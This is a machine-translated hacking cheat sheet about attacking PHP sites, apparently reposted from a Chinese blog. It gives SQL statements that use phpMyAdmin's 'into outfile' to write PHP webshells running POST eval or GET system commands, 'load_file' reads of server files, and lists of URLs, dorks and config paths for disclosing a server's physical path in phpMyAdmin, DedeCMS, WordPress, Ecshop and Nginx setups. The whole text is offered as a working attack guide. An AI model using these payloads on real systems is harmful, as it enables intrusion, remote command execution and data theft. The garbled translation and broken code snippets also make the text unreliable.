turn from: http://kuxoo.com/phpMyAdmin/
[phpMyAdmin to take Shell backstage]
CREATE TABLE ' mysql '. ' Xiaoma ' (' xiaoma1 ' TEXT not NULL);
INSERT into ' MySQL '. ' Xiaoma ' (' xiaoma1 ') VALUES (' <?php @eval ($_post[xiaoma))?> ');
Select Xiaoma1 from Xiaoma into outfile ' e:/wamp/www/7.php ';
The above simultaneous execution, in the database: MySQL create a table named: Xiaoma, Field xiaoma1, export to e:/wamp/www/7.php a sentence connection password: xiaoma
Create TABLE Xiaoma (xiaoma1 text not NULL);
Insert into Xiaoma (XIAOMA1) VALUES (' <?php eval ($_post[xiaoma))?> ');
Select Xiaoma1 from Xiaoma into outfile ' e:/wamp/www/7.php ';
Drop TABLE IF EXISTS xiaoma;
Create DB Wutongyu (this is the database name).
Use Wutongyu (Connection database)
CREATE table Shell (code text) (CREATE table shell, field code is text type data)
INSERT into shell (code) VALUES (' <?php @eval ($_post[' C '));? > '); (Insert a Word, the password is C)
SELECT * from Shell into outfile "d:\\detai\\appserv\\www\\phpmyadmin2\\shell.php" (export shell to absolute path)
phpMyAdmin export Webshell to Chinese path
Set character_set_client= ' GBK ';
Set character_set_connection= ' GBK ';
Set character_set_database= ' GBK ';
Set character_set_results= ' GBK ';
Set character_set_server= ' GBK ';
Select ' <?php eval ($_post[cmd]);? > ' into outfile ' d:\www\ website \mm.php ';
Read file contents: Select Load_file (' e:/xamp/www/s.php ');
Write a sentence: select ' <?php @eval ($_post[cmd])?> ' into outfile ' e:/xamp/www/xiaoma.php '
CMD Execute permissions: SELECT ' <?php echo \ ' <pre>\ '; system ($_get[\ ' cmd\ ')); echo \ ' </pre>\ ';?> ' into outfile ' e:/xamp/www/xiaoma.php '
Select Load_file (' e:/xamp/www/xiaoma.php ');
Select ' <?php echo \ <pre>\ '; system ($_get[\ ' cmd\ '); echo \ ' </pre>\ ';?> ' into outfile ' e:/xamp/www/xiaoma.php '
Then visit the Site Directory: Http://www.xxxx.com/xiaoma.php?cmd=dir
[PHP explosion path Method]
1. Single quotation mark explosion path
Note: Add single quotes directly behind the URL, requiring that the single quotes not be filtered (Gpc=off) and that the server return the error message by default.
www.xxx.com/news.php?id=149′
2, error parameter value explosion path
Note: Change the value of the parameter you want to submit to an error value, such as-1. -99999 single quotes to be filtered may wish to try.
Www.xxx.com/researcharchive.php?id=-1
3, Google explosion path
Description: Combining keywords and site syntax to search for page snapshots of error pages, common keywords have warning and fatal error. Note that if the target site is a level two domain name, the site is connected to its corresponding top-level domain, so that the information to get much more.
SITE:XXX.EDU.TW Warning
Site:xxx.com.tw "Fatal error"
4. test file explosion path
Description: Many Web sites have a test file under the root directory, script code is usually phpinfo ().
www.xxx.com/test.php
www.xxx.com/ceshi.php
www.xxx.com/info.php
www.xxx.com/phpinfo.php
www.xxx.com/php_info.php
www.xxx.com/1.php
5, phpMyAdmin explosion path
Note: Once you find the phpMyAdmin Management page, and then access some specific files in the directory, it is very likely to burst the physical path. As for the phpMyAdmin address can be used wwwscan such tools to sweep, you can also choose Google.
1./phpmyadmin/libraries/lect_lang.lib.php
2./phpmyadmin/index.php?lang[]=1
3./phpmyadmin/phpinfo.php
4. Load_file ()
5./phpmyadmin/themes/darkblue_orange/layout.inc.php
6./phpmyadmin/libraries/select_lang.lib.php
7./phpmyadmin/libraries/lect_lang.lib.php
8./phpmyadmin/libraries/mcrypt.lib.php
6, the configuration file to find the path
Note: If the injection point has file Read permission, you can manually load_file or tools to read the configuration file, and then find the path information (generally at the end of the file). Each platform under the Web server and PHP configuration file default path can be online search, here are listed several common.
Windows:
C:\windows\php.ini PHP configuration file
C:\windows\system32\inetsrv\MetaBase.xml IIS Virtual Host configuration file
Linux:
/etc/php.ini PHP configuration file
/etc/httpd/conf.d/php.conf
/etc/httpd/conf/httpd.conf Apache configuration file
/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/extra/httpd-vhosts.conf Virtual Directory configuration file
7, Nginx file type Error resolution explosion path
Description: This was accidentally discovered yesterday, of course, the Web server is Nginx, and there is a file type resolution vulnerability. Sometimes add/x.php to the image address, the image will not only be used as PHP file execution, but also the possibility of a physical path.
www.xxx.com/top.jpg/x.php
8, other PHP
Dedecms
/member/templets/menulit.php
plus/paycenter/alipay/return_url.php
plus/paycenter/cbpayment/autoreceive.php
paycenter/nps/config_pay_nps.php
plus/task/dede-maketimehtml.php
plus/task/dede-optimize-table.php
plus/task/dede-upcache.php
Wordpress
wp-admin/includes/file.php
wp-content/themes/baiaogu-seo/footer.php
Ecshop Mall System Storm Path Vulnerability file
/api/cron.php
/wap/goods.php
/temp/compiled/ur_here.lbi.php
/temp/compiled/pages.lbi.php
/temp/compiled/user_transaction.dwt.php
/temp/compiled/history.lbi.php
/temp/compiled/page_footer.lbi.php
/temp/compiled/goods.dwt.php
/temp/compiled/user_clips.dwt.php
/temp/compiled/goods_article.lbi.php
/temp/compiled/comments_list.lbi.php
/temp/compiled/recommend_promotion.lbi.php
/temp/compiled/search.dwt.php
/temp/compiled/category_tree.lbi.php
/temp/compiled/user_passport.dwt.php
/temp/compiled/promotion_info.lbi.php
/temp/compiled/user_menu.lbi.php
/temp/compiled/message.dwt.php
/temp/compiled/admin/pagefooter.htm.php
/temp/compiled/admin/page.htm.php
/temp/compiled/admin/start.htm.php
/temp/compiled/admin/goods_search.htm.php
